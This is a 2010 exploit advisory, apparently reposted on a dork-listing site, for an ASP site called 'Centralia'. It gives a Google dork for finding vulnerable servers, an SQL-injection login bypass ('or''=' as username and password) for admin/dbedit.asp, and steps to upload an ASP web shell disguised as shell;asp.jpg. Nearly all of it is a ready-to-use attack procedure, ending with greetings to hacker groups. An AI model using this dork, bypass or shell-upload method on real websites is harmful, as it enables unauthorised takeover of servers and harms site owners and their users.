inurl:showcat.asp?id=

  • 日期:2010-12-14
  • 类别:
  • 作者:anonymous
  • 语法:inurl:showcat.asp?id=
  • ========================================

    Centralia (admin/dbedit.asp?) Bypass and Shell Upload Vulnerability

    ========================================

    #################################################################

    # Exploit : Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability

    # Date : 10 December 2010

    # Author : ali.erroor

    # Version : n/a

    # Googel DorK : inurl:showcat.asp?id=

    # Home : www.network-security.ir

    # Email : ali.erroor@att.net

    #################################################################

    [+] Exploit

    [1] Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..

    [-] http://localhost/path/admin/dbedit.asp?table=products

    [-] username : 'or''='

    [-] password : 'or''='

    [2] Create New Upload Your Shell.Asp ..

    [-] http://localhost/path/admin/dbedit.asp?a=upload_init

    [3] To See Shell Edit Your uploads

    [-] http://localhost/path/uploads/shell;asp.jpg

    [+] Demo

    [-] http://server/admin/dbedit.asp?table=products

    [-] http://server/admin/dbedit.asp?a=upload_init

    #################################################################

    Great 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE

    / Cair3x /novin security team and all iranian hackers

    #################################################################